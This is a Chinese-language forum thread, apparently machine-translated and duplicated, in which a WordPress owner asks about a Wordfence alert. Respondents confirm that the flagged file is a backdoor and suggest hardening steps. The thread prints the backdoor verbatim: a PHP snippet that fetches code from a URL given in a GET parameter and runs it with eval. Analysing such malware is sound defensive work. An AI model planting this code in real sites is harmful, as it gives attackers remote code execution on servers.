WordPress 警告 - 后门:PHP/numeric.rce.8527
Wordpress warning - Backdoor:PHP/numeric.rce.8527
今天早上我一直在查看我网站上的 Wordfence 扫描结果,发现 17 个实例似乎暗示服务器上已安装了恶意软件。如果是这种情况我会感到惊讶,但我想确定一下:
一个例子,
文件名:wp-admin/menu-header-cron.php
文件类型:不是来自 wordpress.org 的核心、主题或插件文件。
详细信息:此文件似乎已被黑客安装或修改以执行恶意 activity。如果您知道此文件,您可以选择忽略它以将其排除在以后的扫描之外。此文件中匹配的文本是:
问题类型为:Backdoor:PHP/numeric.rce.8527
描述:远程代码执行恶意软件
查看问题文件,该文件内容为:
<?php
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
}
任何人都可以确认这是一个无辜的文件还是我需要的东西quarantine/delete?
另外,这个文件是创建的吗?这意味着远程代码能够在 wp-admin/ 子文件夹中创建新文件?有没有一种简单的方法可以防止这种情况发生,从而排除任何进一步的情况。
非常感谢任何输入
该代码段正在读取限制参数,然后作为 URL 传递以获取文件。 eval 函数只会执行它
这么漂亮危险
答案:
- 是的,这是@Everlyn Woodley 已经提到的危险文件。 eval() 在生产中根本不被认为是安全的。
进一步验证,对最新 Wordpress 软件包的源文件的快速 grep "isset($_GET['limit'])" 说明它不是其中的一部分,因此又是一个危险代码。
是的,有人可以在您的服务器上上传文件。可能他们已经上传了某种 web-shell 并且可以操纵您的托管帐户上的任何文件。虽然很常见。
为了防止将来发生这种情况(假设您已经成功清理了当前的 WP 安装),您可以做一些事情,(有很多文章所以它是多余的)但提到很少可能这里没有受伤:
- 在服务器级别安装或启用 mod_security
- 始终确保您拥有最新的 Wordpress 和插件
- 使用最少的插件。
- 简单但有效:更改 wp-plugin 和主题文件夹的位置。
(https://wordpress.org/support/article/editing-wp-config-php/#moving-wp-content-folder )
如果您检查常规 WP 安装的访问日志,您会注意到有大量机器人攻击 known-vulnerabilities 主要针对插件文件夹,只需更改插件文件夹位置以及上述其他安全措施即可显着减少此类黑客攻击。
今天早上我一直在查看我网站上的 Wordfence 扫描结果,发现 17 个实例似乎暗示服务器上已安装了恶意软件。如果是这种情况我会感到惊讶,但我想确定一下:
一个例子,
文件名:wp-admin/menu-header-cron.php 文件类型:不是来自 wordpress.org 的核心、主题或插件文件。 详细信息:此文件似乎已被黑客安装或修改以执行恶意 activity。如果您知道此文件,您可以选择忽略它以将其排除在以后的扫描之外。此文件中匹配的文本是:
问题类型为:Backdoor:PHP/numeric.rce.8527 描述:远程代码执行恶意软件
查看问题文件,该文件内容为:
<?php
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
}
任何人都可以确认这是一个无辜的文件还是我需要的东西quarantine/delete?
另外,这个文件是创建的吗?这意味着远程代码能够在 wp-admin/ 子文件夹中创建新文件?有没有一种简单的方法可以防止这种情况发生,从而排除任何进一步的情况。
非常感谢任何输入
该代码段正在读取限制参数,然后作为 URL 传递以获取文件。 eval 函数只会执行它
这么漂亮危险
答案:
- 是的,这是@Everlyn Woodley 已经提到的危险文件。 eval() 在生产中根本不被认为是安全的。
进一步验证,对最新 Wordpress 软件包的源文件的快速 grep "isset($_GET['limit'])" 说明它不是其中的一部分,因此又是一个危险代码。
是的,有人可以在您的服务器上上传文件。可能他们已经上传了某种 web-shell 并且可以操纵您的托管帐户上的任何文件。虽然很常见。
为了防止将来发生这种情况(假设您已经成功清理了当前的 WP 安装),您可以做一些事情,(有很多文章所以它是多余的)但提到很少可能这里没有受伤:
- 在服务器级别安装或启用 mod_security
- 始终确保您拥有最新的 Wordpress 和插件
- 使用最少的插件。
- 简单但有效:更改 wp-plugin 和主题文件夹的位置。 (https://wordpress.org/support/article/editing-wp-config-php/#moving-wp-content-folder )
如果您检查常规 WP 安装的访问日志,您会注意到有大量机器人攻击 known-vulnerabilities 主要针对插件文件夹,只需更改插件文件夹位置以及上述其他安全措施即可显着减少此类黑客攻击。